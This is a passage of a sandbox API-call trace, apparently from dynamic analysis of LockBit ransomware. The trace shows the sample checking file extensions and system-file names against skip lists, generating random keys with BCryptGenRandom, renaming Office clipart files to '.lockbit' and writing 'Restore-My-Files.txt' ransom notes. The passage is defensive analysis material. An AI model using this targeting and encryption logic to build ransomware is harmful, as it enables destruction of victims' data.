lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.964] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.964] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.965] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00913_.WMF") returned -1 [0175.965] lstrcmpiW (lpString1="ntldr", lpString2="SO00913_.WMF") returned -1 [0175.965] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00913_.WMF") returned -1 [0175.965] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00913_.WMF") returned -1 [0175.965] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00913_.WMF") returned -1 [0175.965] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00913_.WMF") returned 1 [0175.966] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00913_.WMF") returned -1 [0175.966] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.966] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00913_.WMF") returned=".WMF" [0175.966] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.966] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.966] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.967] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.967] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.967] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.967] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.967] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.967] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.967] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.967] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.967] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00913_.WMF.lockbit") returned 72 [0175.967] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00913_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00913_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.972] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.972] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.972] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=10420) returned 1 [0175.972] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.973] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.973] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.973] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.974] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.974] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.976] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00913_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00913_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.976] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.976] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.978] free (_Block=0x1fa2ed8) [0175.978] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00913_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.978] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.978] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.978] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1b0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00914_.WMF", cAlternateFileName="")) returned 1 [0175.978] lstrcmpiW (lpString1=".", lpString2="SO00914_.WMF") returned -1 [0175.978] lstrcmpiW (lpString1="..", lpString2="SO00914_.WMF") returned -1 [0175.978] PathFindExtensionW (pszPath="SO00914_.WMF") returned=".WMF" [0175.978] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.978] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.978] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.978] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.978] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.978] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.978] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.978] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.978] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.978] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.978] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.978] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.979] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.979] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.980] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00914_.WMF") returned -1 [0175.980] lstrcmpiW (lpString1="ntldr", lpString2="SO00914_.WMF") returned -1 [0175.980] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00914_.WMF") returned -1 [0175.980] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00914_.WMF") returned -1 [0175.980] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00914_.WMF") returned -1 [0175.980] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00914_.WMF") returned 1 [0175.980] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00914_.WMF") returned -1 [0175.980] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.980] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00914_.WMF") returned=".WMF" [0175.980] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.981] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.981] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.982] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.982] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.982] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.982] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.982] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00914_.WMF.lockbit") returned 72 [0175.982] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00914_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00914_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0175.983] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.983] malloc (_Size=0x40068) returned 0x3df0008 [0175.983] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6924) returned 1 [0175.983] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.984] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.984] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.984] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.984] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.990] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00914_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00914_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.990] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.990] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.991] free (_Block=0x1fa2ed8) [0175.991] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00914_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.991] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.991] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.992] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5aa3ec70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1bf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00915_.WMF", cAlternateFileName="")) returned 1 [0175.992] lstrcmpiW (lpString1=".", lpString2="SO00915_.WMF") returned -1 [0175.992] lstrcmpiW (lpString1="..", lpString2="SO00915_.WMF") returned -1 [0175.992] PathFindExtensionW (pszPath="SO00915_.WMF") returned=".WMF" [0175.992] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.992] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.993] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.993] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00915_.WMF") returned -1 [0175.994] lstrcmpiW (lpString1="ntldr", lpString2="SO00915_.WMF") returned -1 [0175.994] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00915_.WMF") returned -1 [0175.994] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00915_.WMF") returned -1 [0175.994] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00915_.WMF") returned -1 [0175.994] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00915_.WMF") returned 1 [0175.994] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00915_.WMF") returned -1 [0175.994] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.994] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00915_.WMF") returned=".WMF" [0175.994] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.994] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.994] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.995] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.995] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00915_.WMF.lockbit") returned 72 [0175.995] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00915_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00915_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0175.997] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.997] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.997] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7160) returned 1 [0175.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.997] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.997] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.997] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.998] 